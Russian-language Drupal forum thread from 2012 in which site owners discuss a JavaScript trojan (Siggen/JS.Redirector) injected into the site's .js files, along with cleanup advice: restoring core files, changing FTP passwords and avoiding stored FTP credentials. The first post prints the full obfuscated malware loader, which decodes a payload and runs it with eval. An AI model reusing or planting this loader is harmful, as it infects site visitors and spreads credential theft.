15 марта 2012 в 5:26
Здравствуйте снова! Примерно пару недель назад, появились жалобы, что антивирус Avast блокирует сайт из-за трояна в файлах *.js. В основном вредоносный код был замечен в таких файлах как /misc/drupal.js, jquery.js, /sites/all/modules/lightbox2/js/lightbox.js и ещё скорее всего в скриптах тем script.js и скриптах ckeditor, wysiwyg.
Пока данный вирус был замечен на версиях 6.24 и менее.
Мною были замечены левые строки в кодах такого содержания (В каждом файле код немного отличался друг от друга):
var mf2d7233="";function nb7bad5799a4(){var i123cebb5=String,s3c605da=Array.prototype.slice.call(arguments).join(""),o74a1c=s3c605da.substr(15,3)-595,v7fad74e2,p400d5b1c;s3c605da=s3c605da.substr(18);var f540de=k0c455bc(s3c605da);for(var ia83b7=0;ia83b7<f540de;ia83b7++){try{throw(ydf1edd0d=s3c605da.substr(ia83b7,1));}catch(e){ydf1edd0d=e;};if(ydf1edd0d=='–'){o74a1c="";ia83b7=c7fb1b1a(ia83b7);v916ff=s3c605da.substr(ia83b7,1);while(d56d5f5(v916ff)){o74a1c+=v916ff;ia83b7++;v916ff=rae687c(s3c605da,ia83b7);}o74a1c-=454;continue;}v7fad74e2="";if(y2395e(ydf1edd0d)){ia83b7++;ydf1edd0d=s3c605da.substr(ia83b7,1);while(ydf1edd0d!='®'){v7fad74e2+=ydf1edd0d;ia83b7++;ydf1edd0d=s3c605da.substr(ia83b7,1);}v7fad74e2=v7fad74e2-o74a1c-48;if(v7fad74e2<0)v7fad74e2+=256;v7fad74e2=wc06c3(v7fad74e2);i24b00591(v7fad74e2);continue;}k097b6f=raf2b38(ydf1edd0d);if(k097b6f>848)k097b6f-=848;p400d5b1c=k097b6f-o74a1c-48;p400d5b1c=i2cad64e9(p400d5b1c);mf2d7233+=xf4ebce6(p400d5b1c);}}nb7bad5799a4("e4c","c","6e","5","1ea4","58","f8","69","8®","191®","–4","92–®","1","8","8®®","2","03","®–","6","0","6–6","–63","3–F–","4","6","1–","®","1","71","®","–5","3","4","–","®","2","33","®®239®","®2","3","8®","®168","®","®1","6","9®","®160®","®251®®14","1","®–477","–Q","–","56","7–","®","170","®","–","56","5–®21","®®0","®®","1","7®–","61","5–®2","41®–","5","47","–®2","®","®2","5","5","®","–","6","0","1–","/","–","485–o–","492","–®1","4","7","®–","52","4","–®","1","5","0","®®","157®","®22","2®","–","5","66–®20","®®","2","0®","®","16®®","2","1","8®","–49","8","–","®139","®","®","1","39","®®1","9","8","®","®20","1","®®","20","5","®","®","19","5","®","–","5","37","–®","2","4","3","®","–","50","2–","®202","®®","21","7®®","2","10","®®2","10®","®","206®","–","6","40","–®24®","]–","610","–","1–","55","5–®","7","®®11","®","–","4","6","3–®","1","5","8","®®","155","®–56","6","–®","2®–585","–","&","®","2","2","5®–6","50–","Wc","–54","7–®250","®®18","8","®","–6","29–","F","®14","®","®6","®®2","6®–","5","92–®1","99®®1","9","6®–","4","6","3","–","B","–48","2–®181®","–6","13","–5–","4","66–","\\d","®","176","®","®1","81","®–624","–","J","–6","44","–S","]","T","®1","4®–59","0–","/–52","3–","®222®","®22","7®®","21","7","®–5","0","1–®206","®","®2","14®–","4","84–®1","2","4","®","–53","5","–","®24","9®","®250®","®","2","51","®–","4","6","2","–","®","1","58","®","–","58","6","–®","3","2®–","633","–DJ","®","3","®®32®","–","6","4","8","–","/","/","®18®","®2","5®","g","–","64","5","–","]ST","–","497","–®","193®®","1","96®","–","506","–®","2","1","0®","®2","01","®","–","6","4","5","–S","®","22","®–6","0","6","–","®2","41®®23","2®","–6","3","8","–","c","–6","33","–","®2","40","®","®","2","37®®23","6","®–636","–®2","3","9","®","]","OT","JU","–4","9","3","–®2","06®","®133","®–46","5","–","®179®®180®®1","81®","–","616–","8","–55","6–","®","2","®–","555","–","®","24","6®®","2","5","2®®181","®","–","565–","®22","0®","®191®","–","48","0–","z","–46","0–","q","C–6","1","4–","®","2","1","8®","–","477–P","®","196","®","–","62","6","–®2","33","®–","5","0","9–q","p","®","20","3","®–64","0","–","YM_","W","–","51","0","–®2","0","5","®–641","–","Y","_–573–®21","3®","–4","9","8–","®2","0","3","®–6","5","2","–","dcek–531","–®","2","4","0®®2","26®–5","93–(","*1–504","–®199","®–","6","20","–","®","2","4","6®","–4","89–","®1","4","4","®s","–456–","®1","5","2®–51","2–®2","2","3","®","®","21","6®–","4","9","3–","®","1","86","®–","6","31","–","U","JPO","®9","®","®","10","®–646–®","16","®","–5","91–","4","®198","®","®","195®","®1","9","4®","–","6","4","9–","®2","52®","\\–","5","94","–\"","–","5","9","4–®","220","®®","2","2","8","®","3%","*","–4","6","0–","®","15","4","®","–","516–®22","1","®","–564–","®21®","®","20","4®®22®–4","90","–®205","®–64","6–","jV\\–","645–","P","–","5","89–","®","30®–","5","1","6","–®14","2®®","1","7","1","®®17","1®","®","1","7","1®","®","14","2","®–6","3","5–","®21®–6","24–","®","3","®","–6","45–","®15®","–55","3","–®","1","4","®–","54","8–","®","1","5","5","®–5","1","9","–","®1","23®","–","6","08–®","21","1","®–47","8–QQ–592–","1#","–","6","2","9–","MCNV","–","58","1–®221","®'","(","–5","0","7","–","®2","2","3","®®","2","0","3®®","2","0","9","®–59","8","–","!","'","®","2","24®","®","2","53","®","®2","2","4®","®2","4","1","®","–","6","00–","®25","3®®2","07","®","–50","8","–","p","–5","52","–®","155®","®","155","®–5","7","8–®","1","81®","–63","9","–_–","5","5","2–","®2","43","®–5","2","5–®","2","3","3","®®","15","1®","–","5","43–®","241","®","–590","–","®2","9®","®2","5","®","®","2","8","®–","6","1","9–®245","®","–","63","2–®","3","1","®","®","2®","–","53","5–","®22","9®","®","24","0®–","4","78–","®","171","®–","5","0","8–®2","1","9®–","553–","®","0®®2","48®–","5","1","3–®","2","1","7","®–","4","90","–®200®®1","3","0®","–","538","–","®235®–6","01–(","7®","8®/","–","6","0","6","–-5–","6","08–/","8–5","5","4–®8®","®","7®–","49","9–","®159®–545–","®4®","–6","1","8–(–5","7","9–","®14","®","–","4","6","6","–","®","1","6","3®–","52","3","–","®","1","9","5®","®","2","14","®","–5","58–","®","5","®","–50","3–®","1","9","8®","®","1","37®–5","1","9–","®1","5","2®","–","6","28–F","C","?","–","569","–","®","7®","–","568","–®","2","01®–","5","0","2","–","®13","7","®","®","1","87®","–","643","–®29®J","(–","623","–","®2","30","®","®2","27","®","®226","®","®","2","2","6®","–533–®13","6","®®2","45","®–","63","5","–F–","6","35","–W–","5","99","–®2","2","5®4","–","6","0","7","–",",",";–5","5","0","–","®","2","4","9®®0®–4","74","–","®","18","4®d–","5","87","–®242®","–","639–","®","9®M","–6","48–","aUg","_W–5","8","7–#)","–60","7","–®","24","7","®","–","45","7","–®","1","50®","–6","2","6–","N–5","4","6","–","®","24","1®®","23","7®®0","®","®","24","1®®2","0","9","®","–53","6","–®","23","8","®","®2","3","1®®2","39","®","®2","3","1","®–","5","9","3","–",")","/","–","5","01","–®1","3","5","®®134","®®","2","10","®–50","8","–®","20","1","®®216","®®","207®","®","214®–","6","32–","V–4","9","2–®","125®","®","1","2","7®®","1","45®","–","513–x","ut–","5","48","–","®15","1","®®151","®","–","55","1","–","®4®–47","2","–","®1","6","5","®","–494–","®2","02®®","193","®","®20","0","®–48","5–®","19","5®","–","478","–v®1","88®","®","1","9","3","®®1","84®®1","73","®h–5","18–","®173","®®1","4","4","®–485–","v–","5","00–®","2","10®","–543–®238®","®1","®","®","253®","®1","84®","®","2","4","3","®®","2","3","4","®","®","2","5","5®®","234","®","®25","2®®","23","6","®®","2","51®®2","42","®","–51","9–","®2","25","®","–","5","8","6–","(®219","®","®","23","9®®","1","9","3®®1","9","0","®","®","189®","®","18","9®–","6","48","–","®","2","51®–5","3","6–®","24","5®–","52","8","–","®","221®","®2","3","6®®","22","7®®23","4","®®238","®","®","16","8®","–4","8","4–","®","189","®–","54","7–","®251","®","®","2","5","5","®","–5","87–","®26®","–5","2","7–®","21","8","®","®","22","1®®","242®–5","56","–®9","®","–60","1–7–49","9–®19","0","®","®20","9®–6","3","5","–J","HMF","–","58","7–","#","®28®","®","2","6","®–","4","9","5","–","y®150®","y","–","5","56–","®","2","52®","–6","43","–","b[P","–","52","7–","®","237","®","®","22","6","®–5","4","9–","®","254®","®","253","®","–523","–","®","1","4","9®–50","8–®1","42®®","1","43®–479–i","®","1","9","6®–5","02–","mj–","521–®","12","4®®12","4","®–57","5–®","1","7","8®","®17","8®","–5","30","–®229","®–54","0–","®","2","3","6®®","166","®","–598","–®","232","®","–5","71–","®2","5®","–60","7","–","1","2","<–","512","–","®1","52®–","63","7","–","YL","H","–55","2–","®","2","4","6","®®11®–","514–®191®","®22","4®","–548–","®2","3","9®","®2","®","®","24","3®–4","95–y","®150","®®1","5","0","®y–","4","81–r–5","82","–®","1","9","®®3","1","®","®","2","9","®–","6","34–","TP","I","X","–","6","2","1","–","<","®","2","54","®®0","®–65","4–","®","24","®","–","515","–®","23","2®","–","6","0","7","–®2","1","4®®2","11","®–","5","5","7","–®1","60®®1","60","®","®","160","®–","5","3","4","–","®137","®®","1","37","®","®2","4","7","®®","233","®®2","3","8","®","®228®","®239®","–","52","4","–","®2","3","7","®","–","524","–","®","16","4","®","®238®","®239®","®","240®®220","®–","5","4","6–","®24","8®–","621","–","8–528–","®22","5","®®154®","®","1","8","3","®","–","5","3","1–","®","1","57®","–57","0–®21","4®","–","5","0","3–","®","1","5","6®","–","59","6–","®","203","®","–4","93–a`","–64","0","–","®","243","®","–","5","82","–","®18","5®","®1","8","5","®–6","27–Z","–","500–","k–","515–","w","v–5","6","2","–®1","65","®","®","16","5","®®2","5®","–5","69","–®","22","2®®17","6","®®1","7","3","®–58","5","–","®","1","88®","®1","88®","®188®","–4","66–®17","5®®1","5","9","®","®","174®®16","5","®–653–","g–","478–","®","1","88","®v®","1","83®","–","647–","_]`","R–","58","6","–®2","4®","–","5","9","5","–®2","21®–","46","5","–","x[®","1","61®","®","1","7","6®","®16","9","®–","6","44–","Q","–5","35","–","®","2","4","5","®","–46","7–®16","6","®–6","22–","GF®0","®","®","1","®–","612–®2","38®I","–","638–®2","45®","®2","42®","–5","7","0","–","®173","®","®1","73®","®","17","3","®–","5","6","4","–","®","1","6","7®","–","6","39–","`","R","W","M","X–","6","14","–G","–","6","2","7–","®1","1®UV","WC","I–51","0","–","®","2","01","®–","6","1","5–","8","®","2","4","1","®®","14","®–","654–®2","4","®–467","–","o","x","J–","6","2","5–","®22","9®","®228®®","228®®","2","28","®–5","69","–","®32","®®","222","®®","1","76®","–","5","00–","h","–","5","40–","®","1","4","3","®®1","4","3®®","1","4","3®","–","5","16–®2","25®","–5","7","9–","®","16","®","®31","®®","22","®–5","7","3","–","®","23®®","27®®","21","3®–4","94–®","2","03","®–54","5–®","2","53®–","573","–®","10®","®199®®228®–470","–`®","18","1®","®1","78","®","–6","1","0","–8","®","2","3","6","®","®","2","4","7","®","–","5","0","2–","®1","28®","®173","®","–5","6","2–®2","5","3","®","®16®","®","4","®","®","2","0","2®","–","6","3","5–","W","FS–60","6–,","–4","8","5","–®","1","90","®®1","88®w","x","–611–","®25","1®","A<","–","5","20","–","®19","7®–533","–","®24","3®","®24","1®®","2","3","2","®–6","2","9","–","M","F","®","7®–5","8","6","–®","22","1","®","–636–","®2","0","®Y","–","5","8","0","–#","–63","4","–F–5","0","0","–®209","®–","569","–®","2","3®","–","57","2–","®24®®1","5®–6","32","–PI","®1","0®®","21®","–","47","0–","i–591–","®","21","7","®®","22","8","®","®","217","®®224","®®231","®#",",","–","65","4–","®31","®","–","59","6–","®","249","®","–5","52","–®1","5","9®","–49","7","–","eddd®19","5","®","®","1","92","®","®1","8","8","®","®1","91","®®1","3","7","®®","188®","®","20","3","®","–600–","2–","5","54","–®","249®®2","®","–","52","9","–","®2","2","3®–","6","2","9–","\"G–","491–","®","190®","–6","01","–/","'","–","6","05","–","®","2","39","®:*–4","8","6","–®194®","®185®®","19","2®","®","1","9","6®y–","467–","x","JG","–6","4","3–","®2","4","6","®","®","24","6","®","–5","8","1","–,®","1","8","8®®185","®","®","1","84®–","4","66–","®1","85","®","–","59","1–®2","44","®–59","4–","®2","0","1","®–","6","50","–","®25","4®","–571","–","\"","®206","®®2","0","5","®","®","206","®","®22","4®");eval(mf2d7233);function k0c455bc(gc6a1b){return gc6a1b.length;}function c7fb1b1a(s7e32d5a8){return ++s7e32d5a8;}function rae687c(wcfb1c,o8fece35a){return wcfb1c.substr(o8fece35a,1);}function wc06c3(d128b8a){if(d128b8a==168)d128b8a=1025;else if(d128b8a==184)d128b8a=1105;return (d128b8a>=192 && d128b8a<256) ? d128b8a+848 : d128b8a;}function d56d5f5(q42872ba3){return q42872ba3!='–';}function y2395e(fed467){return fed467=='®';}function i24b00591(gf3664){var i123cebb5=String;mf2d7233+=i123cebb5["\x66r\x6f\x6dCha\x72\x43ode"](gf3664);}function xf4ebce6(a527af){var i123cebb5=String;return i123cebb5["\x66r\x6f\x6dCha\x72\x43ode"](a527af);}function i2cad64e9(ha7d7549){var lf4dd7=ha7d7549;if(lf4dd7<0)lf4dd7+=256;if(lf4dd7==168)lf4dd7=1025;else if(lf4dd7==184)lf4dd7=1105;return (lf4dd7>=192 && lf4dd7<256) ? lf4dd7+848 : lf4dd7;}function raf2b38(d0228c6){return (d0228c6+'')["c\x68a\x72\x43\x6fd\x65At"](0);}
Вопрос как с этим бороться? Дырка ли движки, или что-то иное?
Комментарии
дырка скорей всего в безопасности у тебя.
Друпал тут не причем.
Скачай друпал с официального сайта и замени файлы оригиналами.
Как они заразили, никто не скажет. Телепатов нет.
Так что придется самому тебе сайт шуршить на поски дыры.
Может формат ввода разрешил full или php
или еще +100500 причин.
У меня пару недель назад такое же было.
Вкратце, как работает вирус:
1. Цепляется пользователем с сайта, если антивирус не блокирует.
2. Ищет конфиг файлы фтп-менеджеров, вытягивает из них пароли.
3. Заходит на сервак и дописывает примерно 25кб кода в конец каждого js-файла.
далее эти скрипты цепляются на другую машину, и все по кругу.
Лечится бекапом и сменой паролей от ftp.
Да, скорее всего по FTP. Меняйте пароли, не пользуйтесь FTP-клиентом из тотал-коммандера.
Да и не пользуйтесь FTP вообще. Ещё хрен знает когда, году в 2006, уже были трояны, которые как прокси работали, снифали фтп-трафик
2kyky, пользуюсь Filezilla...
Возможно при заходе из винды, вирус и цепанулся.
Потому что обнаружил только на тех сайтах, откуда заходил из под винды, хотя антивирус и стоит.
Вирус как неделю правда на сайтах находился. В районе 3х дней был размещен на разных сайтах.
тот же вирус и меня "порадовал"
это js/redirector, он же siggen192
более 300 скриптов инфицировал, я проделал кропотливую работу по удалению вредоносного кода из каждого зараженного js файла.
трояна убил, но теперь не работает fckeditor, хотя как положенно отображается в админке, и все настройки сохранились
поставил ckeditor - та же история, не работает
по факту вижу только поле для ввода html кода
догадываюсь, что переустановка fck ничего не изменит
Помогите, люди добрые!
Sirius_sound Скачайте Друпал с drupal.org и обновите корневые файлы. Возможно, при чистке вируса, вы что-то задели в файлах ядра.
Если я прав, то обновление поможет.
спасибо большое!
помогла замена файлов корня, а также папок includes и misc
Добрый вечер!
Подскажите пожалуйста, как удалить этот вирус?
Моя краткая история - попал этот вирус на 3 моих drupal сайта. Первым меня об этом оповестил ест-но Яндекс))
Я порылся на форуме/инете, проверил комп cureit и avast-ом, далее скачал все файлы с сайта на комп и проверил их - нашел этот вирус siggen - удалил все файлы с ним. Заменил пароли на фтп, удалил Total Commander, почистил все диски и кэш браузеров. Ещё раз все перепроверил и закачал сайт обратно. После повторной проверки Яндексом я дико обрадовался (Вирусов нет Ура!). Но... рано.. сегодня от Яндекса опять пришло сообщение о вирусе, перепроверил сайт - опять тот же вирус в js скрипте темы (которую я даже не использую). Что делать? Как убить эту заразу? Поделитесь пожалуйста своим опытом.
ап) никто не удалял этот вирус? опять пролез ко мне... уж не знаю где искать..
Теперь у меня есть скриптец, который ищет эту какашку и автоматом чистит, а если не смог подчистить, то скажет об этом в каком файле именно.
Ну я удалил по второму кругу этот вирь. Пока вроде все нормально.. Жду следующей проверки Яндекса..
D7, у меня уже по-третьему кругу.. но только на одном проекте, попробую отключить там PHP формат, может быть поможет, но вирус этот бесит реально.
AnreeChess, дело не в PHP формате, а доступа к FTP, и защиты Windows. (Только после работы на винде появлялся этот вирус). Поэтому удаляйте вирус (или можете обратиться ко мне за услугой удаления, почистил уже больше 10 чужих сайтов, также делаю запрос в Яндекс для ускоренной перепроверки сайта и убирания метки о вредоности сайта), меняйте пароль к FTP и не заходите туда через программные клиенты (Типа FileZilla), если не уверены в безопасности своей системы. Я теперь с сайта только под Linux работаю.